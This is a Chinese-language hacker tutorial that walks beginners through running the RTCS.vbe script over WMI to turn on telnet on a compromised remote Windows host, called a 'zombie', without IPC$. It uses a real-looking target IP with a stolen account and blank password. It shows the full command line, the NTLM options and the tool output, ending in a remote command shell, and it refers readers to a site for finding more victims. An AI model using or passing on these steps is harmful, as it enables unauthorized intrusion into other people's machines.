菜鸟开telnet入侵3389终结篇         by:Domain X  

大家好啊,我是Domain X ,上次做了一个《菜鸟开telnet入侵3389》的动画，有不少朋友看后都问我假如肉鸡没开ipc$怎么办？仔细想也是哦~有了帐号密码却不能玩~~那滋味肯定是很难受的，呵呵~但方法总是有的！条条大道同罗马嘛!今天我就给大家演示一下如何不依赖ipc$开启肉鸡的telnet.

准备工具:
1.cmd.exe
3.RTCS.vbe(今天的主角哦~~是一个用来开启远程主机的telnet的脚本,优点是不依赖远程主机的ipc$开放与否~但需要对方的WMI服务开启~该服务为系统重要服务,默认开启~)

今天的演示目标:221.235.151.140
帐号:yd
密码:NULL
关于如何找肉鸡我就不再赘述了~大家如果不会,可以去中国红客吧www.honker8.net去看我做的关于如何使用流光的教程~~

好,下面开工~~~~
首先打开RTCS.vbe
cs cript D:\黑客工具\telnet\RTCS\RTCS.vbe targetIP username password NTLMAuthor telnetport

用法:cs cript 路径(D:\黑客工具\telnet\RTCS\便是我的路径,请做相应的更改.)\RTCS.vbe 肉鸡IP 帐号 密码 NTLM验证方式 telnet服务端口

cscritpt是用来调用rtcs的脚本宿主程序,一定要加上~~
其中 NTLM 值可取0，1，2：
0: 不使用 NTLM 身份验证；
1: 先尝试 NTLM 身份验证。如果失败，再使用用户名和密码；
2: 只使用 NTLM 身份验证。
顺便纠正一下~上次由于疏忽将0和2的解释搞颠倒了~呵呵~

好,下面我们执行命令:
cs cript D:\黑客工具\telnet\RTCS\RTCS.vbe 221.235.151.140 yd "" 1 8864

Conneting 221.235.151.140....
OK!
Setting NTLM=1....
OK!
Setting port=8864....
OK!
Querying state of telnet server....
Changeing state....
OK!
Target telnet server has been START Successfully!
Now, you can try: telnet 221.235.151.140 8864, to get a shell.
好,现在我们已经开了肉鸡的telnet了~端口是8864,NTLM验证是1
下面我们输入命令
telnet 221.235.151.140 8864来telnet肉鸡

*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
看到了吗?已经进去了,就是这么简单~~你会了吗?

不会的话也不要紧,大家可以来问我,我的QQ:247280674
好了,动画就到这里~~
8888888